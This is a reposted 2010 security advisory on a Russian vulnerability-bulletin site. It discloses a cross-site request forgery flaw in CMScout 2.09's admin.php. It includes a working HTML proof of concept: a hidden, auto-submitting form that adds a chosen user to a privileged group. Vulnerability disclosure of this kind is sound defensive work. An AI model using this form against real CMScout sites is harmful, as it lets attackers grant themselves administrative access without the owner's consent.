Информационная безопасность
[RU] switch to English


Дополнительная информация

  Cводка уязвимостей безопасности в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

  [security bulletin] HPSBMI02614 SSRT100344 rev.1 - HP webOS Contacts Application, Remote Execution of Arbitrary Code

  Novell Vibe 3 BETA OnPrem Stored Cross-site Scripting Vulnerability

  Multiple XSS in Solarwinds Orion NPM 10.1

  www.eVuln.com : HTTP Response Splitting in WWWThreads (php version)

From:High-Tech Bridge Security Research <advisory_(at)_htbridge.ch>
Date:12 декабря 2010 г.
Subject:XSRF (CSRF) in CMScout

Vulnerability ID: HTB22719
Reference: http://www.htbridge.ch/advisory/xsrf_csrf_in_cmscout.html
Product: CMScout
Vendor: CMScout Team ( http://www.cmscout.co.za/ )
Vulnerable Version: 2.09 and probably prior versions
Vendor Notification: 25 November 2010
Vulnerability Type: CSRF (Cross-Site Request Forgery)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Low
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)

Vulnerability Details:
The vulnerability exists due to failure in the "admin.php" script to properly verify the source of HTTP request.

Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

Attacker can use browser to exploit this vulnerability. The following PoC is available:

<form action="http://host/admin.
php?page=users&subpage=usergroups&subpage=usergroups&action=add&u
id=USER_ID" method="post" name="main" >
<input type="hidden" name="gid" value="1">
<input type="hidden" name="utype" value="2">
<input type="hidden" name="action" value="Add">
</form>
<script>
document.main.submit();
</script>

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород